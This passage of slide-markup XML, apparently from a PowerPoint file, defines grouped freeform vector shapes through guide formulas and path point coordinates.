                  <a:gd name="T55" fmla="*/ 703 h 715"/>
                  <a:gd name="T56" fmla="*/ 200 w 415"/>
                  <a:gd name="T57" fmla="*/ 688 h 715"/>
                  <a:gd name="T58" fmla="*/ 184 w 415"/>
                  <a:gd name="T59" fmla="*/ 661 h 715"/>
                  <a:gd name="T60" fmla="*/ 184 w 415"/>
                  <a:gd name="T61" fmla="*/ 661 h 715"/>
                  <a:gd name="T62" fmla="*/ 163 w 415"/>
                  <a:gd name="T63" fmla="*/ 593 h 715"/>
                  <a:gd name="T64" fmla="*/ 90 w 415"/>
                  <a:gd name="T65" fmla="*/ 283 h 715"/>
                  <a:gd name="T66" fmla="*/ 21 w 415"/>
                  <a:gd name="T67" fmla="*/ 299 h 715"/>
                  <a:gd name="T68" fmla="*/ 0 w 415"/>
                  <a:gd name="T69" fmla="*/ 204 h 715"/>
                  <a:gd name="T70" fmla="*/ 68 w 415"/>
                  <a:gd name="T71" fmla="*/ 189 h 715"/>
                  <a:gd name="T72" fmla="*/ 31 w 415"/>
                  <a:gd name="T73" fmla="*/ 31 h 715"/>
                  <a:gd name="T74" fmla="*/ 173 w 415"/>
                  <a:gd name="T75" fmla="*/ 0 h 7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15" h="715">
                    <a:moveTo>
                      <a:pt x="173" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="210" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="299" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="310" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="598"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="325" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="714"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="215" y="703"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="661"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="204"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173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9" name="Freeform 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4500563" y="1131888"/>
                <a:ext cx="161925" cy="287337"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 448"/>
                  <a:gd name="T1" fmla="*/ 688 h 799"/>
                  <a:gd name="T2" fmla="*/ 189 w 448"/>
                  <a:gd name="T3" fmla="*/ 688 h 799"/>
                  <a:gd name="T4" fmla="*/ 221 w 448"/>
                  <a:gd name="T5" fmla="*/ 677 h 799"/>
                  <a:gd name="T6" fmla="*/ 232 w 448"/>
                  <a:gd name="T7" fmla="*/ 667 h 799"/>
                  <a:gd name="T8" fmla="*/ 236 w 448"/>
                  <a:gd name="T9" fmla="*/ 656 h 799"/>
                  <a:gd name="T10" fmla="*/ 236 w 448"/>
                  <a:gd name="T11" fmla="*/ 656 h 799"/>
                  <a:gd name="T12" fmla="*/ 247 w 448"/>
                  <a:gd name="T13" fmla="*/ 630 h 799"/>
                  <a:gd name="T14" fmla="*/ 247 w 448"/>
                  <a:gd name="T15" fmla="*/ 599 h 799"/>
                  <a:gd name="T16" fmla="*/ 0 w 448"/>
                  <a:gd name="T17" fmla="*/ 74 h 799"/>
                  <a:gd name="T18" fmla="*/ 147 w 448"/>
                  <a:gd name="T19" fmla="*/ 48 h 799"/>
                  <a:gd name="T20" fmla="*/ 294 w 448"/>
                  <a:gd name="T21" fmla="*/ 415 h 799"/>
                  <a:gd name="T22" fmla="*/ 300 w 448"/>
                  <a:gd name="T23" fmla="*/ 415 h 799"/>
                  <a:gd name="T24" fmla="*/ 305 w 448"/>
                  <a:gd name="T25" fmla="*/ 21 h 799"/>
                  <a:gd name="T26" fmla="*/ 447 w 448"/>
                  <a:gd name="T27" fmla="*/ 0 h 799"/>
                  <a:gd name="T28" fmla="*/ 400 w 448"/>
                  <a:gd name="T29" fmla="*/ 536 h 799"/>
                  <a:gd name="T30" fmla="*/ 400 w 448"/>
                  <a:gd name="T31" fmla="*/ 536 h 799"/>
                  <a:gd name="T32" fmla="*/ 394 w 448"/>
                  <a:gd name="T33" fmla="*/ 599 h 799"/>
                  <a:gd name="T34" fmla="*/ 383 w 448"/>
                  <a:gd name="T35" fmla="*/ 651 h 799"/>
                  <a:gd name="T36" fmla="*/ 383 w 448"/>
                  <a:gd name="T37" fmla="*/ 651 h 799"/>
                  <a:gd name="T38" fmla="*/ 373 w 448"/>
                  <a:gd name="T39" fmla="*/ 693 h 799"/>
                  <a:gd name="T40" fmla="*/ 357 w 448"/>
                  <a:gd name="T41" fmla="*/ 725 h 799"/>
                  <a:gd name="T42" fmla="*/ 357 w 448"/>
                  <a:gd name="T43" fmla="*/ 725 h 799"/>
                  <a:gd name="T44" fmla="*/ 331 w 448"/>
                  <a:gd name="T45" fmla="*/ 751 h 799"/>
                  <a:gd name="T46" fmla="*/ 305 w 448"/>
                  <a:gd name="T47" fmla="*/ 767 h 799"/>
                  <a:gd name="T48" fmla="*/ 305 w 448"/>
                  <a:gd name="T49" fmla="*/ 767 h 799"/>
                  <a:gd name="T50" fmla="*/ 268 w 448"/>
                  <a:gd name="T51" fmla="*/ 777 h 799"/>
                  <a:gd name="T52" fmla="*/ 226 w 448"/>
                  <a:gd name="T53" fmla="*/ 788 h 799"/>
                  <a:gd name="T54" fmla="*/ 169 w 448"/>
                  <a:gd name="T55" fmla="*/ 798 h 799"/>
                  <a:gd name="T56" fmla="*/ 147 w 448"/>
                  <a:gd name="T57" fmla="*/ 693 h 799"/>
                  <a:gd name="T58" fmla="*/ 147 w 448"/>
                  <a:gd name="T59" fmla="*/ 693 h 799"/>
                  <a:gd name="T60" fmla="*/ 189 w 448"/>
                  <a:gd name="T61" fmla="*/ 688 h 7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48" h="799">
                    <a:moveTo>
                      <a:pt x="189" y="688"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="189" y="688"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="667"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="651"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="725"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="751"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="305" y="767"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="777"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="788"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="169" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="693"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="688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9" name="Group 98"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9951368" y="3672077"/>
              <a:ext cx="1929467" cy="2241124"/>
              <a:chOff x="5754688" y="1204913"/>
              <a:chExt cx="1955800" cy="2271712"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="595959"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="155" name="Freeform 36"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5754688" y="1204913"/>
                <a:ext cx="222250" cy="284162"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 616"/>
                  <a:gd name="T1" fmla="*/ 640 h 788"/>
                  <a:gd name="T2" fmla="*/ 43 w 616"/>
                  <a:gd name="T3" fmla="*/ 556 h 788"/>
                  <a:gd name="T4" fmla="*/ 69 w 616"/>
                  <a:gd name="T5" fmla="*/ 520 h 788"/>
                  <a:gd name="T6" fmla="*/ 95 w 616"/>
                  <a:gd name="T7" fmla="*/ 488 h 788"/>
                  <a:gd name="T8" fmla="*/ 168 w 616"/>
                  <a:gd name="T9" fmla="*/ 436 h 788"/>
                  <a:gd name="T10" fmla="*/ 211 w 616"/>
                  <a:gd name="T11" fmla="*/ 409 h 788"/>
                  <a:gd name="T12" fmla="*/ 337 w 616"/>
                  <a:gd name="T13" fmla="*/ 352 h 788"/>
                  <a:gd name="T14" fmla="*/ 389 w 616"/>
                  <a:gd name="T15" fmla="*/ 330 h 788"/>
                  <a:gd name="T16" fmla="*/ 421 w 616"/>
                  <a:gd name="T17" fmla="*/ 299 h 788"/>
                  <a:gd name="T18" fmla="*/ 436 w 616"/>
                  <a:gd name="T19" fmla="*/ 283 h 788"/>
                  <a:gd name="T20" fmla="*/ 447 w 616"/>
                  <a:gd name="T21" fmla="*/ 267 h 788"/>
                  <a:gd name="T22" fmla="*/ 462 w 616"/>
                  <a:gd name="T23" fmla="*/ 220 h 788"/>
                  <a:gd name="T24" fmla="*/ 473 w 616"/>
                  <a:gd name="T25" fmla="*/ 163 h 788"/>
                  <a:gd name="T26" fmla="*/ 462 w 616"/>
                  <a:gd name="T27" fmla="*/ 136 h 788"/>
                  <a:gd name="T28" fmla="*/ 441 w 616"/>
                  <a:gd name="T29" fmla="*/ 115 h 788"/>
                  <a:gd name="T30" fmla="*/ 426 w 616"/>
                  <a:gd name="T31" fmla="*/ 110 h 788"/>
                  <a:gd name="T32" fmla="*/ 378 w 616"/>
                  <a:gd name="T33" fmla="*/ 105 h 788"/>
                  <a:gd name="T34" fmla="*/ 363 w 616"/>
                  <a:gd name="T35" fmla="*/ 115 h 788"/>
                  <a:gd name="T36" fmla="*/ 347 w 616"/>
                  <a:gd name="T37" fmla="*/ 126 h 788"/>
                  <a:gd name="T38" fmla="*/ 321 w 616"/>
                  <a:gd name="T39" fmla="*/ 168 h 788"/>
                  <a:gd name="T40" fmla="*/ 300 w 616"/>
                  <a:gd name="T41" fmla="*/ 220 h 788"/>
                  <a:gd name="T42" fmla="*/ 174 w 616"/>
                  <a:gd name="T43" fmla="*/ 147 h 788"/>
                  <a:gd name="T44" fmla="*/ 190 w 616"/>
                  <a:gd name="T45" fmla="*/ 99 h 788"/>
                  <a:gd name="T46" fmla="*/ 242 w 616"/>
                  <a:gd name="T47" fmla="*/ 36 h 788"/>
                  <a:gd name="T48" fmla="*/ 279 w 616"/>
                  <a:gd name="T49" fmla="*/ 16 h 788"/>
                  <a:gd name="T50" fmla="*/ 357 w 616"/>
                  <a:gd name="T51" fmla="*/ 0 h 788"/>
                  <a:gd name="T52" fmla="*/ 457 w 616"/>
                  <a:gd name="T53" fmla="*/ 16 h 788"/>
                  <a:gd name="T54" fmla="*/ 504 w 616"/>
                  <a:gd name="T55" fmla="*/ 36 h 788"/>
                  <a:gd name="T56" fmla="*/ 578 w 616"/>
                  <a:gd name="T57" fmla="*/ 89 h 788"/>
                  <a:gd name="T58" fmla="*/ 599 w 616"/>
                  <a:gd name="T59" fmla="*/ 120 h 788"/>
                  <a:gd name="T60" fmla="*/ 615 w 616"/>
                  <a:gd name="T61" fmla="*/ 194 h 788"/>
                  <a:gd name="T62" fmla="*/ 599 w 616"/>
                  <a:gd name="T63" fmla="*/ 278 h 788"/>
                  <a:gd name="T64" fmla="*/ 588 w 616"/>
                  <a:gd name="T65" fmla="*/ 309 h 788"/>
                  <a:gd name="T66" fmla="*/ 573 w 616"/>
                  <a:gd name="T67" fmla="*/ 341 h 788"/>
                  <a:gd name="T68" fmla="*/ 536 w 616"/>
                  <a:gd name="T69" fmla="*/ 388 h 788"/>
                  <a:gd name="T70" fmla="*/ 515 w 616"/>
                  <a:gd name="T71" fmla="*/ 409 h 788"/>
                  <a:gd name="T72" fmla="*/ 484 w 616"/>
                  <a:gd name="T73" fmla="*/ 430 h 788"/>
                  <a:gd name="T74" fmla="*/ 315 w 616"/>
                  <a:gd name="T75" fmla="*/ 509 h 788"/>
                  <a:gd name="T76" fmla="*/ 274 w 616"/>
                  <a:gd name="T77" fmla="*/ 530 h 788"/>
                  <a:gd name="T78" fmla="*/ 247 w 616"/>
                  <a:gd name="T79" fmla="*/ 546 h 788"/>
                  <a:gd name="T80" fmla="*/ 205 w 616"/>
                  <a:gd name="T81" fmla="*/ 588 h 788"/>
                  <a:gd name="T82" fmla="*/ 431 w 616"/>
                  <a:gd name="T83" fmla="*/ 787 h 7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616" h="788">
                    <a:moveTo>
                      <a:pt x="0" y="640"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="436"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="283"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="163"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="321" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="457" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="504" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="578" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="615" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="588" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="573" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="557" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="567"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="677"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="64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6" name="Freeform 37"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5935663" y="1444625"/>
                <a:ext cx="68262" cy="73025"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 127 w 191"/>
                  <a:gd name="T1" fmla="*/ 204 h 205"/>
                  <a:gd name="T2" fmla="*/ 0 w 191"/>
                  <a:gd name="T3" fmla="*/ 152 h 205"/>
                  <a:gd name="T4" fmla="*/ 58 w 191"/>
                  <a:gd name="T5" fmla="*/ 0 h 205"/>
                  <a:gd name="T6" fmla="*/ 190 w 191"/>
                  <a:gd name="T7" fmla="*/ 52 h 205"/>
                  <a:gd name="T8" fmla="*/ 127 w 191"/>
                  <a:gd name="T9" fmla="*/ 204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1" h="205">
                    <a:moveTo>
                      <a:pt x="127" y="204"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="204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7" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6094413" y="1331913"/>
                <a:ext cx="282575" cy="317500"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 426 w 783"/>
                  <a:gd name="T1" fmla="*/ 614 h 883"/>
                  <a:gd name="T2" fmla="*/ 426 w 783"/>
                  <a:gd name="T3" fmla="*/ 614 h 883"/>
                  <a:gd name="T4" fmla="*/ 662 w 783"/>
                  <a:gd name="T5" fmla="*/ 162 h 883"/>
                  <a:gd name="T6" fmla="*/ 782 w 783"/>
                  <a:gd name="T7" fmla="*/ 225 h 883"/>
                  <a:gd name="T8" fmla="*/ 441 w 783"/>
                  <a:gd name="T9" fmla="*/ 882 h 883"/>
                  <a:gd name="T10" fmla="*/ 289 w 783"/>
                  <a:gd name="T11" fmla="*/ 803 h 883"/>
                  <a:gd name="T12" fmla="*/ 368 w 783"/>
                  <a:gd name="T13" fmla="*/ 257 h 883"/>
                  <a:gd name="T14" fmla="*/ 363 w 783"/>
                  <a:gd name="T15" fmla="*/ 257 h 883"/>
                  <a:gd name="T16" fmla="*/ 127 w 783"/>
                  <a:gd name="T17" fmla="*/ 719 h 883"/>
                  <a:gd name="T18" fmla="*/ 0 w 783"/>
                  <a:gd name="T19" fmla="*/ 656 h 883"/>
                  <a:gd name="T20" fmla="*/ 347 w 783"/>
                  <a:gd name="T21" fmla="*/ 0 h 883"/>
                  <a:gd name="T22" fmla="*/ 499 w 783"/>
                  <a:gd name="T23" fmla="*/ 78 h 883"/>
                  <a:gd name="T24" fmla="*/ 426 w 783"/>
                  <a:gd name="T25" fmla="*/ 614 h 8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83" h="883">
                    <a:moveTo>
                      <a:pt x="426" y="614"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="426" y="614"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="782" y="225"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="882"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="803"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="656"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="614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8" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6296025" y="1512888"/>
                <a:ext cx="188913" cy="207962"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 168 w 526"/>
                  <a:gd name="T1" fmla="*/ 305 h 579"/>
                  <a:gd name="T2" fmla="*/ 142 w 526"/>
                  <a:gd name="T3" fmla="*/ 347 h 579"/>
                  <a:gd name="T4" fmla="*/ 131 w 526"/>
                  <a:gd name="T5" fmla="*/ 389 h 579"/>
                  <a:gd name="T6" fmla="*/ 137 w 526"/>
                  <a:gd name="T7" fmla="*/ 426 h 579"/>
                  <a:gd name="T8" fmla="*/ 142 w 526"/>
                  <a:gd name="T9" fmla="*/ 441 h 579"/>
                  <a:gd name="T10" fmla="*/ 158 w 526"/>
                  <a:gd name="T11" fmla="*/ 452 h 579"/>
                  <a:gd name="T12" fmla="*/ 189 w 526"/>
                  <a:gd name="T13" fmla="*/ 463 h 579"/>
                  <a:gd name="T14" fmla="*/ 215 w 526"/>
                  <a:gd name="T15" fmla="*/ 457 h 579"/>
                  <a:gd name="T16" fmla="*/ 247 w 526"/>
                  <a:gd name="T17" fmla="*/ 441 h 579"/>
                  <a:gd name="T18" fmla="*/ 389 w 526"/>
                  <a:gd name="T19" fmla="*/ 473 h 579"/>
                  <a:gd name="T20" fmla="*/ 357 w 526"/>
                  <a:gd name="T21" fmla="*/ 510 h 579"/>
                  <a:gd name="T22" fmla="*/ 299 w 526"/>
                  <a:gd name="T23" fmla="*/ 557 h 579"/>
                  <a:gd name="T24" fmla="*/ 262 w 526"/>
                  <a:gd name="T25" fmla="*/ 573 h 579"/>
                  <a:gd name="T26" fmla="*/ 195 w 526"/>
                  <a:gd name="T27" fmla="*/ 573 h 579"/>
                  <a:gd name="T28" fmla="*/ 110 w 526"/>
                  <a:gd name="T29" fmla="*/ 536 h 579"/>
                  <a:gd name="T30" fmla="*/ 78 w 526"/>
                  <a:gd name="T31" fmla="*/ 515 h 579"/>
                  <a:gd name="T32" fmla="*/ 31 w 526"/>
                  <a:gd name="T33" fmla="*/ 473 h 579"/>
                  <a:gd name="T34" fmla="*/ 21 w 526"/>
                  <a:gd name="T35" fmla="*/ 447 h 579"/>
